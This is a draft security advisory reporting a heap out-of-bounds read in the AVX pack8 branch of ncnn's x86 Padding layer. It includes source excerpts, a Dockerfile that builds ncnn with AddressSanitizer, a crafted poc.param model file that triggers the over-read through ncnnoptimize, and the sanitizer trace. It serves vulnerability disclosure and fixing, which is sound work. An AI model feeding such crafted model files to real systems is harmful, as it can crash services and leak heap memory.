All advisories
Draft

Heap Out-Of-Bounds Read in x86 Padding

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Out-Of-Bounds Read in x86 Padding

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/padding_x86.cpp:292 in Padding_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

The AVX pack8 branch of Padding_x86::forward indexes the per-channel padding table by output channel group without checking it against per_channel_pad_data_size. A .param file that declares eight per-channel values but 64 channels of front padding makes the optimizer load 32-byte vectors well past that table, aborting ncnnoptimize and otherwise painting adjacent heap words into the padded output. The entry point is ncnnoptimize <param> <bin> ... through ModelWriter::shape_inference().

Detail

Padding::load_param() reads per_channel_pad_data_size = pd.get(6, 0) and front = pd.get(7, 0) as independent integers, and load_model() allocates exactly per_channel_pad_data_size floats. The x86 three-dimensional pack8 branch then computes the output channel count from front/behind and uses the loop counter over output groups to index the per-channel table.

// src/layer/padding.cpp:29
int Padding::load_model(const ModelBin& mb)
{
    if (per_channel_pad_data_size)
    {
        per_channel_pad_data = mb.load(per_channel_pad_data_size, 1);
    }

// src/layer/x86/padding_x86.cpp:275
            int outc = channels * elempack + front + behind;

// src/layer/x86/padding_x86.cpp:288
                for (int q = 0; q < outc / out_elempack; q++)
                {
                    Mat borderm = top_blob.channel(q);

                    __m256 pad_value = per_channel_pad_data_size ? _mm256_loadu_ps((const float*)per_channel_pad_data + q * 8) : _mm256_set1_ps(value);

The PoC uses Input data 0=1 1=1 2=8 and Padding pad 0=0 1=0 2=0 3=0 4=0 5=0 6=8 7=64 8=0. The eight input channels repack to one elempack = 8 group, so outc = 8 + 64 + 0 = 72 and the loop runs for q = 0 .. 8 — nine groups. per_channel_pad_data, however, holds only the eight declared floats, backed by the 100-byte allocation in the report (32 payload bytes, the 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD slack).

The load at q * 8 therefore leaves the eight declared floats from q == 1 onward; groups 1 and 2 still land inside the malloc slack, and q == 3 loads 32 bytes starting at byte 96, crossing the end of the 100-byte block — the address ASan reports as 0 bytes after 100-byte region. The ternary checks only that per_channel_pad_data_size is non-zero, never that it covers outc channels.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-out-of-bounds-read-in-x86-padding && cd ncnn-poc-heap-out-of-bounds-read-in-x86-padding

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=8
Padding pad 1 1 data out 6=8 7=64
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5100000000a0 at pc 0x5dc9a4d921f7 bp 0x7ffd4a87e0b0 sp 0x7ffd4a87e0a0
READ of size 32 at 0x5100000000a0 thread T0
    #0 0x5dc9a4d921f6 in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
    #1 0x5dc9a4d921f6 in ncnn::Padding_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/padding_x86_avx512.cpp:292
    #2 0x5dc99fb49f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #3 0x5dc99fb3bb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x5dc99fb9b9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x5dc99fa2d3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x5dc99faaaeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x70a33ebe91c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x70a33ebe928a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x5dc99fa2a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x5100000000a4 is located 0 bytes after 100-byte region [0x510000000040,0x5100000000a4)
allocated by thread T0 here:
    #0 0x70a33f262f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5dc99faf9bc5 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5dc99faf9bc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
    #3 0x5dc99fb2ec1a in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:309
    #4 0x5dc9a4d42323 in ncnn::Padding::load_model(ncnn::ModelBin const&) /ncnn/src/layer/padding.cpp:33
    #5 0x5dc99fb96a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #6 0x5dc99faaac34 in main /ncnn/tools/ncnnoptimize.cpp:2793
    #7 0x70a33ebe91c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x70a33ebe928a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x5dc99fa2a624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)

Credit

Zheng Yu @ DepthFirst